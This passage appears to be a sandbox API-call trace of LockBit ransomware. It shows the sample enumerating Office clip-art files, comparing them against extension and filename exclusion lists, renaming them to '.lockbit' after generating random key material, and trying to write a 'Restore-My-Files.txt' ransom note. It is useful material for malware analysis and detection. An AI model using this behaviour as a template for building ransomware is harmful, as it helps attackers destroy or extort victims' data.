param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0125.098] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0125.098] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6aa1600, ftCreationTime.dwHighDateTime=0x1bd732d, ftLastAccessTime.dwLowDateTime=0x65df6970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6aa1600, ftLastWriteTime.dwHighDateTime=0x1bd732d, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0101858.BMP", cAlternateFileName="")) returned 1 [0125.099] lstrcmpiW (lpString1=".", lpString2="J0101858.BMP") returned -1 [0125.099] lstrcmpiW (lpString1="..", lpString2="J0101858.BMP") returned -1 [0125.099] PathFindExtensionW (pszPath="J0101858.BMP") returned=".BMP" [0125.099] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0125.099] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0125.099] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0125.099] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0125.099] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0125.099] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0125.099] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0125.099] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0125.099] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0125.099] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0125.099] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0125.099] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0125.099] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0125.099] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0125.099] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0125.099] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0125.099] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0125.099] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0125.099] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0125.099] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0125.099] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0125.099] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0125.099] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0125.099] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0125.100] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0125.100] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0125.100] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0101858.BMP") returned 1 [0125.100] lstrcmpiW (lpString1="ntldr", lpString2="J0101858.BMP") returned 1 [0125.100] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0101858.BMP") returned 1 [0125.100] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0101858.BMP") returned -1 [0125.100] lstrcmpiW (lpString1="autorun.inf", lpString2="J0101858.BMP") returned -1 [0125.101] lstrcmpiW (lpString1="thumbs.db", lpString2="J0101858.BMP") returned 1 [0125.101] lstrcmpiW (lpString1="iconcache.db", lpString2="J0101858.BMP") returned -1 [0125.101] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0125.101] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned=".BMP" [0125.101] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0125.101] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0125.101] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0125.101] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0125.101] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0125.101] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0125.101] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0125.101] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0125.101] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0125.101] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0125.101] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0125.101] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0125.101] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0125.101] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0125.101] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0125.101] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0125.101] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0125.101] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0125.101] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0125.101] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0125.101] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0125.101] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0125.102] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0125.102] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0125.102] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0125.102] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0125.102] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0125.102] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0125.102] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP.lockbit") returned 72 [0125.102] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101858.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0125.103] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0125.103] malloc (_Size=0x40068) returned 0x3df0008 [0125.103] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=32184) returned 1 [0125.103] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0125.104] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0125.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0125.104] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0125.104] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0125.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0125.104] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0125.109] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0125.109] malloc (_Size=0xa6) returned 0x77d7a8 [0125.109] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0126.269] free (_Block=0x77d7a8) [0126.269] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0126.269] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0126.269] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0126.269] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac703800, ftCreationTime.dwHighDateTime=0x1bd732d, ftLastAccessTime.dwLowDateTime=0x65df6970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xac703800, ftLastWriteTime.dwHighDateTime=0x1bd732d, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0101859.BMP", cAlternateFileName="")) returned 1 [0126.269] lstrcmpiW (lpString1=".", lpString2="J0101859.BMP") returned -1 [0126.269] lstrcmpiW (lpString1="..", lpString2="J0101859.BMP") returned -1 [0126.269] PathFindExtensionW (pszPath="J0101859.BMP") returned=".BMP" [0126.269] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0126.269] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0126.269] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0126.269] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0126.269] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0126.270] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0126.270] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0126.270] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0126.270] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0126.271] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0126.271] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0126.271] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0126.271] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0126.271] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0126.271] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0126.271] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0126.271] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0126.271] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0126.271] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0126.271] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0126.271] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0126.271] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0126.271] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0101859.BMP") returned 1 [0126.271] lstrcmpiW (lpString1="ntldr", lpString2="J0101859.BMP") returned 1 [0126.271] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0101859.BMP") returned 1 [0126.271] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0101859.BMP") returned -1 [0126.271] lstrcmpiW (lpString1="autorun.inf", lpString2="J0101859.BMP") returned -1 [0126.271] lstrcmpiW (lpString1="thumbs.db", lpString2="J0101859.BMP") returned 1 [0126.271] lstrcmpiW (lpString1="iconcache.db", lpString2="J0101859.BMP") returned -1 [0126.271] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0126.271] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned=".BMP" [0126.271] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0126.271] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0126.271] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0126.271] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0126.271] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0126.271] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0126.272] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0126.272] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP.lockbit") returned 72 [0126.272] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101859.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0126.273] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0126.273] malloc (_Size=0x40068) returned 0x3df0008 [0126.273] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=31968) returned 1 [0126.273] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0126.274] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0126.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0126.274] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0126.275] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0126.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0126.275] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0126.279] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0126.279] malloc (_Size=0xa6) returned 0x77d7a8 [0126.279] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0127.128] free (_Block=0x77d7a8) [0127.128] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0127.128] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0127.128] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0127.128] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed29200, ftCreationTime.dwHighDateTime=0x1bd732d, ftLastAccessTime.dwLowDateTime=0x56321b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xaed29200, ftLastWriteTime.dwHighDateTime=0x1bd732d, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0101860.BMP", cAlternateFileName="")) returned 1 [0127.128] lstrcmpiW (lpString1=".", lpString2="J0101860.BMP") returned -1 [0127.129] lstrcmpiW (lpString1="..", lpString2="J0101860.BMP") returned -1 [0127.129] PathFindExtensionW (pszPath="J0101860.BMP") returned=".BMP" [0127.129] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0127.129] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0127.129] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0127.129] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0127.129] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0127.129] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0127.129] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0127.129] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0127.129] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0127.129] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0127.129] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0127.129] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0127.129] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0127.129] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0127.129] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0127.129] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0127.129] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0127.129] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0127.129] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0127.129] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0127.129] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0127.129] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0127.129] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0127.129] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0127.129] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0127.130] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0127.130] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0127.130] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0127.130] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0127.130] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0127.130] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0127.130] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0127.130] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0127.130] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0127.130] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0127.130] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0127.130] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0127.130] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0127.130] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0127.130] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0127.130] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0127.130] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0127.130] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0127.130] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0127.130] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0127.130] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0127.130] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0127.131] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0101860.BMP") returned 1 [0127.131] lstrcmpiW (lpString1="ntldr", lpString2="J0101860.BMP") returned 1 [0127.131] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0101860.BMP") returned 1 [0127.131] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0101860.BMP") returned -1 [0127.131] lstrcmpiW (lpString1="autorun.inf", lpString2="J0101860.BMP") returned -1 [0127.131] lstrcmpiW (lpString1="thumbs.db", lpString2="J0101860.BMP") returned 1 [0127.131] lstrcmpiW (lpString1="iconcache.db", lpString2="J0101860.BMP") returned -1 [0127.131] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0127.131] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP") returned=".BMP" [0127.131] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0127.131] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0127.131] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0127.131] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0127.131] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0127.131] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0127.131] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0127.131] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0127.131] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0127.131] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0127.131] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0127.131] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0127.132] lstrcmpiW (lpString1=".dbt", 